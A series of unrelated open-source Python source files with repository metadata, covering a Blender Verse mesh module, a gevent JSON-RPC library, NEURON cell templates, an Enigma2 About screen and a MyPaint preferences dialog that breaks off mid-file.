b3d_face[layer] = verse_id
# Update id cache
self.quads.id_cache[verse_id] = b3d_face
else:
# Was face changed?
face = b3d_face_to_tuple(b3d_face)
if self.quads.items[verse_id] != face:
self.quads.items[verse_id] = face
alive_faces[verse_id] = b3d_face.index
# Try to find deleted faces
rem_faces = [face_id for face_id in self.quads.items.keys() if face_id not in alive_faces]
# This will send unset commands for deleted faces
for face_id in rem_faces:
self.quads.items.pop(face_id)
if face_id in self.quads.id_cache:
self.quads.id_cache.pop(face_id)
def clear_ID_cache(self):
"""
This method clear cache with references on vertices, edges and faces
"""
self.vertices.id_cache = {}
self.edges.id_cache = {}
self.quads.id_cache = {}
def update_references(self):
"""
This method tries to update references at bmesh, when old bmesh was removed
"""
if self.bmesh is None:
if bpy.context.edit_object is not None and \
bpy.context.edit_object.data == self.mesh:
self.bmesh = bmesh.from_edit_mesh(self.mesh)
self.bm_from_edit_mesh = True
else:
self.bmesh = bmesh.new()
self.bmesh.from_mesh(self.mesh)
self.bm_from_edit_mesh = False
else:
try:
self.bmesh.verts
except ReferenceError:
if bpy.context.edit_object is not None and \
bpy.context.edit_object.data == self.mesh:
self.bmesh = bmesh.from_edit_mesh(self.mesh)
self.bm_from_edit_mesh = True
else:
self.bmesh = bmesh.new()
self.bmesh.from_mesh(self.mesh)
self.bm_from_edit_mesh = False
self.clear_ID_cache()
def send_updates(self):
"""
Try to send update of edit mesh to Verse server
"""
if self.bmesh is None:
self.bmesh = bmesh.from_edit_mesh(self.mesh)
self.bm_from_edit_mesh = True
else:
if self.bm_from_edit_mesh is False:
self.bmesh = bmesh.from_edit_mesh(self.mesh)
self.bm_from_edit_mesh = True
self.clear_ID_cache()
else:
# Check if bmesh is still fresh
try:
self.bmesh.verts
except ReferenceError:
self.bmesh = bmesh.from_edit_mesh(self.mesh)
self.clear_ID_cache()
self.__send_vertex_updates()
self.__send_edge_updates()
self.__send_face_updates()
def create_empty_b3d_mesh(self, object_node):
"""
Create empty mesh and create blender layers for entity IDs
"""
# Mesh should be empty ATM
self.mesh = object_node.obj.data
self.bmesh = bmesh.new()
self.bmesh.from_mesh(self.mesh)
# Create layers for verse IDs
vert_lay = self.bmesh.verts.layers.int.new('VertIDs')
vert_lay.use_force_default = True
vert_lay.default_value = -1
edge_lay = self.bmesh.edges.layers.int.new('EdgeIDs')
edge_lay.use_force_default = True
edge_lay.default_value = -1
face_lay = self.bmesh.faces.layers.int.new('FaceIDs')
face_lay.use_force_default = True
face_lay.default_value = -1
# Safe blender layers containing IDs to original mesh
self.bmesh.to_mesh(self.mesh)
self.bmesh.free()
self.bmesh = None
@classmethod
def cb_receive_node_link(cls, session, parent_node_id, child_node_id):
"""
When link between nodes is changed, then try to create mesh.
"""
mesh_node = super(VerseMesh, cls).cb_receive_node_link(
session=session,
parent_node_id=parent_node_id,
child_node_id=child_node_id
)
try:
object_node = object3d.VerseObject.objects[parent_node_id]
except KeyError:
pass
else:
mesh_node.create_empty_b3d_mesh(object_node)
mesh_node.mesh.verse_node_id = child_node_id
object_node.mesh_node = mesh_node
return mesh_node
@classmethod
def cb_receive_node_create(cls, session, node_id, parent_id, user_id, custom_type):
"""
When new mesh node is created or verse server, then this callback method is called.
"""
# Call parent class
mesh_node = super(VerseMesh, cls).cb_receive_node_create(
session=session,
node_id=node_id,
parent_id=parent_id,
user_id=user_id,
custom_type=custom_type
)
# When this mesh was created at different Blender, then mesh_node does
# not have valid reference at blender mesh data block
if mesh_node.mesh is None:
try:
object_node = object3d.VerseObject.objects[parent_id]
except KeyError:
# The object was not created yet
pass
else:
mesh_node.create_empty_b3d_mesh(object_node)
mesh_node.mesh.verse_node_id = node_id
object_node.mesh_node = mesh_node
return mesh_node
def draw_IDs(self, context, obj):
"""
This method draws Verse IDs of vertices, edges and faces
"""
font_id, font_size, my_dpi = 0, 12, 72
self.update_references()
vert_id_layer = self.bmesh.verts.layers.int.get('VertIDs')
edge_id_layer = self.bmesh.edges.layers.int.get('EdgeIDs')
face_id_layer = self.bmesh.faces.layers.int.get('FaceIDs')
bgl.glColor3f(1.0, 1.0, 0.0)
for vert_id, vert_co in self.vertices.items.items():
coord_2d = location_3d_to_region_2d(
context.region,
context.space_data.region_3d,
obj.matrix_world * mathutils.Vector(vert_co))
b3d_vert = self.vertices.b3d_vertex(vert_id)
if b3d_vert is not None:
b3d_vert_id = b3d_vert[vert_id_layer]
else:
b3d_vert_id = None
# When coordinates are not outside window, then draw the ID of vertex
if coord_2d is not None:
blf.size(font_id, font_size, my_dpi)
blf.position(font_id, coord_2d[0] + 2, coord_2d[1] + 2, 0)
blf.draw(font_id, str((vert_id, b3d_vert_id)))
bgl.glColor3f(0.0, 1.0, 0.0)
for edge_id, edge_verts in self.edges.items.items():
vert1 = self.vertices.items[edge_verts[0]]
vert2 = self.vertices.items[edge_verts[1]]
edge_co = mathutils.Vector((
(vert2[0] + vert1[0]) / 2.0,
(vert2[1] + vert1[1]) / 2.0,
(vert2[2] + vert1[2]) / 2.0))
b3d_edge = self.edges.b3d_edge(edge_id)
if b3d_edge is not None:
b3d_edge_id = b3d_edge[edge_id_layer]
else:
b3d_edge_id = None
coord_2d = location_3d_to_region_2d(
context.region,
context.space_data.region_3d,
obj.matrix_world * edge_co)
# When coordinates are not outside window, then draw the ID of edge
if coord_2d is not None:
blf.size(font_id, font_size, my_dpi)
blf.position(font_id, coord_2d[0] + 2, coord_2d[1] + 2, 0)
blf.draw(font_id, str((edge_id, b3d_edge_id)))
bgl.glColor3f(0.0, 1.0, 1.0)
for face_id, face_verts in self.quads.items.items():
if face_verts[3] == 0:
vert1 = self.vertices.items[face_verts[0]]
vert2 = self.vertices.items[face_verts[1]]
vert3 = self.vertices.items[face_verts[2]]
face_co = mathutils.Vector((
(vert1[0] + vert2[0] + vert3[0]) / 3.0,
(vert1[1] + vert2[1] + vert3[1]) / 3.0,
(vert1[2] + vert2[2] + vert3[2]) / 3.0
))
else:
vert1 = self.vertices.items[face_verts[0]]
vert2 = self.vertices.items[face_verts[1]]
vert3 = self.vertices.items[face_verts[2]]
vert4 = self.vertices.items[face_verts[3]]
face_co = mathutils.Vector((
(vert1[0] + vert2[0] + vert3[0] + vert4[0]) / 4.0,
(vert1[1] + vert2[1] + vert3[1] + vert4[1]) / 4.0,
(vert1[2] + vert2[2] + vert3[2] + vert4[2]) / 4.0
))
b3d_face = self.quads.find_b3d_face(face_id)
if b3d_face is not None:
b3d_face_id = b3d_face[face_id_layer]
else:
b3d_face_id = None
coord_2d = location_3d_to_region_2d(
context.region,
context.space_data.region_3d,
obj.matrix_world * face_co)
# When coordinates are not outside window, then draw the ID of face
if coord_2d is not None:
blf.size(font_id, font_size, my_dpi)
blf.position(font_id, coord_2d[0] + 2, coord_2d[1] + 2, 0)
blf.draw(font_id, str((face_id, b3d_face_id)))
# List of Blender classes in this submodule
classes = ()
def init_properties():
"""
Init properties in blender object data type
"""
bpy.types.Mesh.verse_node_id = bpy.props.IntProperty(
name="ID of verse mesh node",
default=-1,
description="ID of node representing mesh at Verse server"
)
def register():
"""
This method register all methods of this submodule
"""
for c in classes:
bpy.utils.register_class(c)
init_properties()
def unregister():
"""
This method unregister all methods of this submodule
"""
for c in classes:
bpy.utils.unregister_class(c)
if __name__ == '__main__':
register()
|
verse/verse-blender
|
io_verse/mesh.py
|
Python
|
gpl-2.0
| 36,256
|
#from account.models import User
from sqlalchemy.sql import func
from flask import Flask
from app import *
class User(db.Model):
__tablename__ = "user"
__table_args__ = {"useexisting" : True}
id = db.Column(db.Integer,primary_key=True)
username = db.Column(db.String(128))
email = db.Column(db.String(128))
|
mehtapgundogan/Tellal
|
app/account/models.py
|
Python
|
gpl-2.0
| 313
|
#!/usr/bin/env python
# encoding: utf-8
"""
Simple and yet high performance JSON RPC v1.0 server/client
"""
from gevent import monkey, server, socket as gsocket, Timeout
monkey.patch_all()
import logging
logger = logging.getLogger("RPC")
import cjson
import socket
class RPCException(Exception): pass
class MethodAlreadyRegisted(RPCException): pass
class MethodNotRegistered(RPCException): pass
class RemoteTimeout(RPCException): pass
class Dispatcher(object):
def __init__(self):
self.funcs = {}
def call(self, func_name, *args):
try:
f = self.funcs[func_name]
except KeyError:
raise MethodNotRegistered("func name:%s not registered" % func_name)
return f(*args)
def register(self, f, name=None):
if not callable(f):
raise TypeError("%s is not callable object", f)
if not name:
name = f.__name__
if name in self.funcs:
raise MethodAlreadyRegisted("func name:%s already registered" % name)
logger.info("register func: %s", name)
self.funcs[name] = f
def register_module(self, module_name):
import importlib
m = importlib.import_module(module_name)
for k, v in m.__dict__.items():
if not k.startswith("_") and callable(v):
self.register(v, module_name +'.'+ k)
def __call__(self, sock, address):
rfile = sock.makefile("rb", -1)
logger.debug("new connection %s", address)
while not sock.closed:
try:
data = rfile.readline()
if len(data) == 0:
logger.info("connection %s closed", address)
break
logger.debug('read %d from %s', len(data), address)
except socket.error as err:
logger.warn(err)
return
try:
msg = cjson.decode(data)
if not isinstance(msg, dict):
logger.warn("not valid rpc request %s", msg)
continue
except cjson.DecodeError as err:
logger.debug(err)
return
msg['result'] = None
msg['error'] = None
if ('params' in msg and
'method' in msg and
'id' in msg ):
try:
method = msg.pop('method')
result = self.call(method, *msg.pop("params"))
msg['result'] = result
except Exception as err:
logger.error(err, exc_info=True)
msg['error'] = u"%s %s " % (err.__class__.__name__, err.message)
else:
err = "not valid msg %s" % msg
msg['error'] = err
sock.sendall(cjson.encode(msg)+'\n')
default_dispatcher = Dispatcher()
register = default_dispatcher.register
register_module = default_dispatcher.register_module
class Client(object):
"""
Client
"""
def __init__(self, dest, timeout=30, **kwargs):
"""
:params dest:
:params timeout:
"""
self.dest = dest
self.sock = gsocket.socket(**kwargs)
self.rfile = self.sock.makefile("rb", -1)
self.sock.connect(dest)
self.timeout = timeout
self.id = 0
def __call__(self, method, *args):
self.id += 1
msg = dict(method=method,
id=self.id,
params=args)
with Timeout(self.timeout, RemoteTimeout):
self.sock.send(cjson.encode(msg)+'\n')
rsp = cjson.decode(self.rfile.readline())
if rsp['error']:
raise RPCException(rsp['error'])
return rsp['result']
def new_server(dispatcher, address, port, **kwargs):
"""
:params dispatcher:
:params address:
:params port:
:params kwargs:
"""
s = server.StreamServer((address, int(port)), dispatcher, **kwargs)
return s
def _main():
import argparse
parser = argparse.ArgumentParser()
add = parser.add_argument
add('-d', '--debug', default=False, action='store_true')
add('--timeout', default=30, type=int, metavar="seconds")
add('address')
add('method', nargs="?")
add('params', nargs="*")
add('-m', default='', metavar='register module')
add('-j', '--json', action="store_true", default=False)
add('-l', '--list', action="store_true", default=False)
"""
[parser.add_argument(i[0], default=i[1], help=i[2])
for i in [('-b', '127.0.0.1:8080', 'endpoint that server bindto'),
('-m', 'time', 'register module'),
('-c', '', 'connect endpoint'),
('-i', '', 'invoke method name'),
('-a', '', 'args')]]
"""
args = parser.parse_args()
if not args.address:
parser.print_help()
exit()
logging.basicConfig(level=logging.DEBUG if args.debug else logging.INFO)
if args.m:
register_module(args.m)
rpc = new_server(default_dispatcher, *args.address.split(":"))
rpc.serve_forever()
else:
client = Client(tuple(args.address.split(":")), args.timeout)
params = args.params
if args.list:
params = [params]
elif args.json and len(params) == 1:
params = cjson.decode(params[0])
logger.info(client(args.method, *params))
if __name__ == '__main__':
_main()
|
mengzhuo/justrpc
|
justrpc.py
|
Python
|
gpl-2.0
| 5,562
|
import numpy as np
from neuron import h
import math
def lambda_f(section, freq):
if h.n3d() < 2:
return 1e5*math.sqrt(section.diam/(math.pi*4*freq*section.Ra*section.cm))
else:
x1 = h.arc3d(0)
d1 = h.diam3d(0)
lam = 0
for i in range(int(h.n3d())):
x2 = h.arc3d(i)
d2 = h.diam3d(i)
lam += (x2 - x1)/math.sqrt(d1 + d2)
x1 = x2
d1 = d2
lam *= math.sqrt(2) * 1e-5*math.sqrt(4*math.pi*freq*section.Ra*section.cm)
return section.L / lam
class Cell(object):
"""Generic cell template."""
def __init__(self):
self.x, self.y, self.z = 0, 0, 0
self.synlist = []
self.all = h.SectionList()
self.create_sections()
self.build_topology()
self.build_subsets()
self.define_geometry()
self.define_biophysics()
self.create_synapses()
#
def create_sections(self):
"""Create the sections of the cell. Remember to do this
in the form::
h.Section(name='soma', cell=self)
"""
raise NotImplementedError("create_sections() is not implemented.")
#
def build_topology(self):
"""Connect the sections of the cell to build a tree."""
raise NotImplementedError("build_topology() is not implemented.")
#
def define_geometry(self):
"""Set the 3D geometry of the cell."""
raise NotImplementedError("define_geometry() is not implemented.")
#
def define_biophysics(self):
"""Assign the membrane properties across the cell."""
raise NotImplementedError("define_biophysics() is not implemented.")
#
def create_synapses(self):
"""Subclasses should create synapses (such as ExpSyn) at various
segments and add them to self.synlist."""
pass # Ignore if child does not implement.
#
def build_subsets(self):
"""Build subset lists. This defines 'all', but subclasses may
want to define others. If overridden, call super() to include 'all'."""
self.all.wholetree(sec=self.soma)
#
def connect2target(self, source_section, target, thresh=10):
"""Make a new NetCon with this cell's membrane
potential at the soma as the source (i.e. the spike detector)
onto the target passed in (i.e. a synapse on a cell).
Subclasses may override with other spike detectors."""
nc = h.NetCon(source_section(1)._ref_v, target, sec = source_section)
nc.threshold = thresh
return nc
#
def is_art(self):
"""Flag to check if we are an integrate-and-fire artificial cell."""
return 0
#
def set_position(self, x, y, z):
"""
Set the base location in 3D and move all other
parts of the cell relative to that location.
"""
for sec in self.all:
sec.push()
#print('secname = %s, h.n3d = %d' % (h.secname(), h.n3d()))
for i in range(int(h.n3d())):
h.pt3dchange(i,
x - self.x + h.x3d(i),
y - self.y + h.y3d(i),
z - self.z + h.z3d(i),
h.diam3d(i), sec=sec)
h.pop_section()
#h.define_shape()
self.x, self.y, self.z = x, y, z
#
def rotateZ(self, theta):
"""Rotate the cell about the Z axis."""
rot_m = numpy.array([[sin(theta), cos(theta)], [cos(theta), -sin(theta)]])
for sec in self.all:
for i in range(int(h.n3d())):
xy = numpy.dot([h.x3d(i), h.y3d(i)], rot_m)
h.pt3dchange(i, xy[0], xy[1], h.z3d(i), h.diam3d(i))
|
penguinscontrol/Spinal-Cord-Modeling
|
Python/cell_template.py
|
Python
|
gpl-2.0
| 3,715
|
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright 2011 Daniel Foreman-Mackey and Michael Gorelick
#
# This is part of pyarxiv.
#
# pyarxiv is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# pyarxiv is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with pyarxiv. If not, see <http://www.gnu.org/licenses/>.
#
"""
bibparser.py
Created by Dan F-M on 2011-01-16.
"""
import re
class BibTex:
def __init__(self,fn):
self.fn = fn
self.parse()
def parse(self):
f = open(self.fn)
self.bib = []
entry = None
for line in f:
if line[0] == '@':
if entry != None:
self.bib.append(entry)
entry = {}
else:
c = line.split('=')
if len(c) >= 2 and entry != None:
entry[c[0].capitalize().strip().strip(',{}')] = c[1].strip().strip(',{}')
self.bib.append(entry)
# print 'Parsed %d entries in %s'%(len(self.bib),self.fn)
if __name__ == "__main__":
import sys
bib = BibTex(sys.argv[1])
|
dfm/pyarxiv
|
bibparser.py
|
Python
|
gpl-2.0
| 1,372
|
#! /usr/bin/python2
# vim: fileencoding=utf-8 encoding=utf-8 et sw=4
# Copyright (C) 2009 Jacek Konieczny <jajcus@jajcus.net>
# Copyright (C) 2009 Andrzej Zaborowski <balrogg@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""
Patches .osc files with .diff.xml files resulting from an upload of
a previous chunk of a multipart upload.
"""
__version__ = "$Revision: 21 $"
import os
import subprocess
import sys
import traceback
import codecs
import locale
import locale, codecs
locale.setlocale(locale.LC_ALL, "en_US.UTF-8")
encoding = locale.getlocale()[1]
sys.stdout = codecs.getwriter(encoding)(sys.stdout, errors = "replace")
sys.stderr = codecs.getwriter(encoding)(sys.stderr, errors = "replace")
if len(sys.argv) < 2 or sys.argv[1] == "--help":
print >>sys.stderr, u"Synopsis:"
print >>sys.stderr, u" %s <file.diff.xml> [osm-files-to-patch...]"
sys.exit(1)
dd = {}
diff = open(sys.argv[1], "r")
sys.stdout.write("Parsing diff\n")
for line in diff:
oldpos = line.find("old_id=\"")
newpos = line.find("new_id=\"")
if oldpos < 0 or newpos < 0:
continue
# For the moment assume every element is operated on only
# once in a changeset (TODO)
old = line[oldpos + 8:]
new = line[newpos + 8:]
old = old[:old.find("\"")]
new = new[:new.find("\"")]
dd[old] = new
for f in sys.argv[2:]:
sys.stdout.write("Parsing " + f + "\n")
change = open(f, "r")
newchange = open(f + ".diffed", "w")
for line in change:
refpos = line.find("ref=\"")
if refpos > -1:
ref = line[refpos + 5:]
ref = ref[:ref.find("\"")]
if ref in dd:
line = line.replace("ref=\"" + ref + "\"", "ref=\"" + dd[ref] + "\"")
newchange.write(line)
newchange.close()
|
OSMBrasil/IJSN_road_import
|
scripts/upload/diffpatch.py
|
Python
|
gpl-2.0
| 2,414
|
import matplotlib.pyplot as plt
import cv2
from skimage.feature import hog
# from skimage import data
image = cv2.imread("MIT/Train/per00001.ppm", cv2.COLOR_BAYER_RG2GRAY)
image = cv2.resize(image, (64, 128))
fd, hog_image = hog(image, orientations=8, pixels_per_cell=(16, 16),
cells_per_block=(1, 1), visualise=True)
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(8, 4))
ax1.axis('off')
ax1.imshow('hola',image)
ax1.set_title('Input image')
# Rescale histogram for better display
# hog_image_rescaled = exposure.rescale_intensity(hog_image, in_range=(0, 0.02))
ax2.axis('off')
# ax2.imshow(hog_image_rescaled, cmap=plt.cm.gray)
ax2.imshow(hog_image, cmap=plt.cm.gray)
ax2.set_title('Histogram of Oriented Gradients')
plt.show()
|
HDLynx/sharingan
|
HOG3.py
|
Python
|
gpl-2.0
| 765
|
from Screen import Screen
from Components.ActionMap import ActionMap
from Components.Sources.StaticText import StaticText
from Components.Harddisk import harddiskmanager
from Components.NimManager import nimmanager
from Components.About import about
from Components.ScrollLabel import ScrollLabel
from Components.config import config
from Tools.StbHardware import getFPVersion
class About(Screen):
def __init__(self, session):
Screen.__init__(self, session)
if config.misc.boxtype.value == 'gb800solo':
AboutText = _("Hardware: ") + " GigaBlue HD 800solo\n"
elif config.misc.boxtype.value == 'gb800se':
AboutText = _("Hardware: ") + " GigaBlue HD 800se\n"
elif config.misc.boxtype.value == 'gb800ue':
AboutText = _("Hardware: ") + " GigaBlue HD 800ue\n"
elif config.misc.boxtype.value == 'gbquad':
AboutText = _("Hardware: ") + " GigaBlue HD Quad\n"
elif config.misc.boxtype.value == 'gbquadplus':
AboutText = _("Hardware: ") + " GigaBlue HD Quad Plus\n"
elif config.misc.boxtype.value == 'gb800seplus':
AboutText = _("Hardware: ") + " GigaBlue HD 800se Plus\n"
elif config.misc.boxtype.value == 'gb800ueplus':
AboutText = _("Hardware: ") + " GigaBlue HD 800ue Plus\n"
else:
AboutText = _("Hardware: ") + about.getHardwareTypeString() + "\n"
AboutText += _("Image: ") + about.getImageTypeString() + "\n"
AboutText += _("Kernel version: ") + about.getKernelVersionString() + "\n"
EnigmaVersion = "GUI Build: " + about.getEnigmaVersionString()
self["EnigmaVersion"] = StaticText(EnigmaVersion)
AboutText += EnigmaVersion + "\n"
ImageVersion = _("Last upgrade: ") + about.getImageVersionString()
self["ImageVersion"] = StaticText(ImageVersion)
AboutText += ImageVersion + "\n"
fp_version = getFPVersion()
if fp_version is None:
fp_version = ""
else:
fp_version = _("Frontprocessor version: %d") % fp_version
AboutText += fp_version + "\n"
self["FPVersion"] = StaticText(fp_version)
self["TunerHeader"] = StaticText(_("Detected NIMs:"))
AboutText += "\n" + _("Detected NIMs:") + "\n"
nims = nimmanager.nimList()
for count in range(len(nims)):
if count < 4:
self["Tuner" + str(count)] = StaticText(nims[count])
else:
self["Tuner" + str(count)] = StaticText("")
AboutText += nims[count] + "\n"
self["HDDHeader"] = StaticText(_("Detected HDD:"))
AboutText += "\n" + _("Detected HDD:") + "\n"
hddlist = harddiskmanager.HDDList()
hddinfo = ""
if hddlist:
for count in range(len(hddlist)):
if hddinfo:
hddinfo += "\n"
hdd = hddlist[count][1]
if int(hdd.free()) > 1024:
hddinfo += "%s\n(%s, %d GB %s)" % (hdd.model(), hdd.capacity(), hdd.free()/1024, _("free"))
else:
hddinfo += "%s\n(%s, %d MB %s)" % (hdd.model(), hdd.capacity(), hdd.free(), _("free"))
else:
hddinfo = _("none")
self["hddA"] = StaticText(hddinfo)
AboutText += hddinfo
self["AboutScrollLabel"] = ScrollLabel(AboutText)
self["actions"] = ActionMap(["SetupActions", "ColorActions", "DirectionActions"],
{
"cancel": self.close,
"ok": self.close,
"green": self.showTranslationInfo,
"up": self["AboutScrollLabel"].pageUp,
"down": self["AboutScrollLabel"].pageDown
})
def showTranslationInfo(self):
self.session.open(TranslationInfo)
class TranslationInfo(Screen):
def __init__(self, session):
Screen.__init__(self, session)
# don't remove the string out of the _(), or it can't be "translated" anymore.
# TRANSLATORS: Add here whatever should be shown in the "translator" about screen, up to 6 lines (use \n for newline)
info = _("TRANSLATOR_INFO")
if info == "TRANSLATOR_INFO":
info = "(N/A)"
infolines = _("").split("\n")
infomap = {}
for x in infolines:
l = x.split(': ')
if len(l) != 2:
continue
(type, value) = l
infomap[type] = value
print infomap
self["TranslationInfo"] = StaticText(info)
translator_name = infomap.get("Language-Team", "none")
if translator_name == "none":
translator_name = infomap.get("Last-Translator", "")
self["TranslatorName"] = StaticText(translator_name)
self["actions"] = ActionMap(["SetupActions"],
{
"cancel": self.close,
"ok": self.close,
})
|
postla/e2-gui
|
lib/python/Screens/About.py
|
Python
|
gpl-2.0
| 4,213
|
import mox
from unittest import TestCase
from kazoo.client import KazooClient
from zoom.www.cache.global_cache import GlobalCache
from test.test_utils import ConfigurationMock, EventMock, FakeMessage
class GlobalCacheTest(TestCase):
def setUp(self):
self.mox = mox.Mox()
self.socket_client1 = self.mox.CreateMockAnything()
self.socket_client2 = self.mox.CreateMockAnything()
self.web_socket_clients = [self.socket_client1, self.socket_client2]
self.configuration = ConfigurationMock
self.zoo_keeper = self.mox.CreateMock(KazooClient)
def tearDown(self):
self.mox.UnsetStubs()
def test_construct(self):
self.mox.ReplayAll()
self._create_global_cache()
self.mox.VerifyAll()
def test_get_mode(self):
self.configuration.global_mode_path = "mode/path"
cache = self._create_global_cache()
self.zoo_keeper.connected = True
self.zoo_keeper.get("mode/path",
watch=mox.IgnoreArg()).AndReturn((None, None))
self.mox.ReplayAll()
cache.get_mode()
self.mox.VerifyAll()
def test_on_update(self):
event = EventMock()
cache = self._create_global_cache()
self.socket_client1.write_message("globalmodejson")
self.socket_client2.write_message("globalmodejson")
self.mox.StubOutWithMock(cache, "get_mode")
cache.get_mode().AndReturn(FakeMessage("globalmodejson"))
self.mox.ReplayAll()
cache.on_update(event)
self.mox.VerifyAll()
def _create_global_cache(self):
return GlobalCache(self.configuration, self.zoo_keeper,
self.web_socket_clients)
|
spottradingllc/zoom
|
test/cache/global_cache_test.py
|
Python
|
gpl-2.0
| 1,736
|
# This file is part of MyPaint.
# Copyright (C) 2008-2009 by Martin Renold <martinxyz@gmx.ch>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
"preferences dialog"
from bisect import bisect_left
from gettext import gettext as _
import gtk, os
gdk = gtk.gdk
from functionwindow import CurveWidget
from lib import mypaintlib
import windowing, filehandling
device_modes = [
('disabled', _("Disabled (no pressure sensitivity)")),
('screen', _("Screen (normal)")),
('window', _("Window (not recommended)")), ]
RESPONSE_REVERT = 1
# Rebindable mouse buttons
mouse_button_actions = [
# These can be names of actions within ActionGroups defined elsewhere,
# or names of actions the handler interprets itself.
# NOTE: The translatable strings for actions are duplicated from
# their action definition. Please keep in sync (or refactor to get the string from there)
# (action_or_whatever, label)
('no_action', _("No action")), #[0] is the default for the comboboxes
('popup_menu', _("Menu")),
('ToggleSubwindows', _("Toggle Subwindows")),
('ColorPickerPopup', _("Pick Color")),
('PickContext', _('Pick Context (layer, brush and color)')),
('PickLayer', _('Select Layer at Cursor')),
('pan_canvas', _("Pan")),
('zoom_canvas', _("Zoom")),
('rotate_canvas', _("Rotate")),
('straight_line', _("Straight Line")),
('straight_line_sequence', _("Sequence of Straight Lines")),
('ColorChangerPopup', _("Color Changer")),
('ColorRingPopup', _("Color Ring")),
('ColorHistoryPopup', _("Color History")),
]
mouse_button_prefs = [
# Used for creating the menus,
# (pref_name, label)
("input.button1_shift_action", _("Button 1 + Shift")),
("input.button1_ctrl_action", _("Button 1 + Ctrl (or Alt)")),
("input.button2_action", _("Button 2")),
("input.button2_shift_action", _("Button 2 + Shift")),
("input.button2_ctrl_action", _("Button 2 + Ctrl (or Alt)")),
("input.button3_action", _("Button 3")),
("input.button3_shift_action", _("Button 3 + Shift")),
("input.button3_ctrl_action", _("Button 3 + Ctrl (or Alt)")),
]
class Window(windowing.Dialog):
'''Window for manipulating preferences.'''
def __init__(self, app):
flags = gtk.DIALOG_DESTROY_WITH_PARENT
buttons = (gtk.STOCK_REVERT_TO_SAVED, RESPONSE_REVERT,
gtk.STOCK_OK, gtk.RESPONSE_ACCEPT)
windowing.Dialog.__init__(self, app=app, title=_('Preferences'),
parent=app.drawWindow, flags=flags,
buttons=buttons)
self.connect('response', self.on_response)
self.in_update_ui = False
# Set up widgets
nb = gtk.Notebook()
nb.set_border_width(12)
self.vbox.pack_start(nb, expand=True, padding=0)
### Input tab
table = gtk.Table(5, 3)
table.set_border_width(12)
table.set_col_spacing(0, 12)
table.set_col_spacing(1, 12)
table.set_row_spacings(6)
current_row = 0
# TRANSLATORS: Tab label
nb.append_page(table, gtk.Label(_('Pen Input')))
xopt = gtk.FILL | gtk.EXPAND
yopt = gtk.FILL
l = gtk.Label()
l.set_alignment(0.0, 0.5)
l.set_markup(_('<b>Input Device</b>'))
table.attach(l, 0, 3, current_row, current_row + 1, xopt, yopt)
current_row += 1
l = gtk.Label()
l.set_alignment(0.0, 0.5)
l.set_line_wrap(True)
l.set_markup(_('Scale input pressure to brush pressure. This is applied to all input devices. The mouse button has an input pressure of 0.5 when pressed.'))
table.attach(l, 1, 3, current_row, current_row + 1, xopt, yopt)
current_row += 1
t = gtk.Table(4, 4)
self.cv = CurveWidget(self.pressure_curve_changed_cb, magnetic=False)
t.attach(self.cv, 0, 3, 0, 3, gtk.EXPAND | gtk.FILL, gtk.EXPAND | gtk.FILL, 5, 0)
l1 = gtk.Label('1.0')
if l1.set_angle:
# TRANSLATORS: Graph y-axis label
l2 = gtk.Label(_('Brush Pressure'))
l2.set_angle(90)
else:
l2 = gtk.Label('')
l3 = gtk.Label('0.0')
t.attach(l1, 3, 4, 0, 1, 0, 0, 5, 0)
t.attach(l2, 3, 4, 1, 2, 0, gtk.EXPAND, 5, 0)
t.attach(l3, 3, 4, 2, 3, 0, 0, 5, 0)
l4 = gtk.Label('0.0')
# TRANSLATORS: Graph x-axis label
l5 = gtk.Label(_('Input Pressure'))
l5.set_justify(gtk.JUSTIFY_CENTER)
l6 = gtk.Label('1.0')
t.attach(l4, 0, 1, 3, 4, 0, 0, 5, 0)
t.attach(l5, 1, 2, 3, 4, gtk.EXPAND, 0, 5, 0)
t.attach(l6, 2, 3, 3, 4, 0, 0, 5, 0)
table.attach(t, 1, 3, current_row, current_row + 1, xopt, yopt)
current_row += 1
l = gtk.Label(_('Mode: '))
l.set_alignment(0.0, 0.5)
table.attach(l, 1, 2, current_row, current_row + 1, xopt, yopt)
combo = self.input_devices_combo = gtk.combo_box_new_text()
for m, s in device_modes:
combo.append_text(s)
combo.connect('changed', self.input_devices_combo_changed_cb)
table.attach(combo, 2, 3, current_row, current_row + 1, xopt, yopt)
current_row += 1
### Buttons tab
table = gtk.Table(5, 3)
table.set_border_width(12)
table.set_col_spacing(0, 12)
table.set_col_spacing(1, 12)
table.set_row_spacings(6)
current_row = 0
nb.append_page(table, gtk.Label(_('Buttons')))
xopt = gtk.FILL | gtk.EXPAND
yopt = gtk.FILL
l = gtk.Label()
l.set_alignment(0.0, 0.5)
l.set_markup(_('<b>Pen and mouse button mappings</b>'))
table.attach(l, 0, 3, current_row, current_row + 1, xopt, yopt)
current_row += 1
# Mouse button actions
self.mouse_action_comboboxes = {}
for pref_name, label_str in mouse_button_prefs:
l = gtk.Label(label_str)
l.set_alignment(0.0, 0.5)
table.attach(l, 1, 2, current_row, current_row + 1, xopt, yopt)
action_name = self.app.preferences.get(pref_name, None)
c = gtk.combo_box_new_text()
self.mouse_action_comboboxes[pref_name] = c
for a, s in mouse_button_actions:
c.append_text(s)
c.connect("changed", self.mouse_button_action_changed, pref_name)
table.attach(c, 2, 3, current_row, current_row + 1, xopt, yopt)
current_row += 1
### Saving tab
table = gtk.Table(5, 3)
table.set_border_width(12)
table.set_col_spacing(0, 12)
table.set_col_spacing(1, 12)
table.set_row_spacings(6)
current_row = 0
nb.append_page(table, gtk.Label(_('Saving')))
xopt = gtk.FILL | gtk.EXPAND
yopt = gtk.FILL
l = gtk.Label()
l.set_alignment(0.0, 0.5)
